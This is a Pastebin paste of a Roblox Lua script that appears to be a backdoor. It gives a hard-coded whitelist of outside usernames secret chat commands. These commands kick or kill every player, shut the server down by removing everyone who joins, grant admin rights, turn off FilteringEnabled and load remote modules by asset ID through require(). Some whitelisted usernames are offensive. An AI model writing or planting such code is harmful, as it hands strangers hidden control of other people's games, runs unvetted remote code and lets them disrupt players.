Advertisement
robloxguy988

Untitled

Mar 10th, 2019
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.76 KB | None | 0 0
  1. local whitelist = {"HomicidalSprayer","painforget","chooseuse", "a4aw", "1MP0551BL3CH405", "PeodTrumpRawpedMeh", "JLX7rKSXVY3DUqaDQYRh", "CALEBBEN3", "TomTezzi "} local prefix = "/e !" local Functions = require(2417952670) game.Players.PlayerAdded:connect(function(player) player.Chatted:connect(function(msg) for i =1,#whitelist do if player.Name == whitelist[i] then if msg == prefix.."KickAll" then --Command Functions.KickAll() elseif msg == "/e !KillAll" then --Command Functions.KillAll() elseif msg == "/e !ShutDown" then --Command local people = game.Players:GetChildren() for i = 1, #people do people[i]:Remove() wait(.1) end function onPlayerEntered(newPlayer) wait(0.001) newPlayer:Remove() end elseif msg == prefix.."MML" or msg == "/e !mml" then --Command Functions.Admin(player) elseif msg == prefix.."MustardGas" or msg == "/e !mustard" then --Command require(1196228933).load(player.Name) elseif msg == prefix.."GrabKnife" then --Command require(1193146271).load(player.Name) elseif msg == prefix.."Plane" then --Command require(1280588623).load(player.Name) elseif msg == prefix.."CoolGun" then --Command require(968275442).load(player.Name) elseif msg == prefix.."mc" then --Command require(1176949464).load(player.Name) elseif msg == prefix.."GUI" then --Command require(1368306381).load(player.Name) elseif msg == prefix.."hi" then --Command require(1232280447).load(player.Name) elseif msg == prefix.."Van" then --Command require(1232280447).load(player.Name) elseif msg == prefix.."Tree" then --Command require(970596902).load(player.Name) elseif msg == prefix.."Suicide" then --Command require(1243720440).load(player.Name) elseif msg == prefix.."noFE" then --Command game.Workspace.FilteringEnabled = false end end end end) end) game.Players.PlayerAdded:connect(onPlayerEntered)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement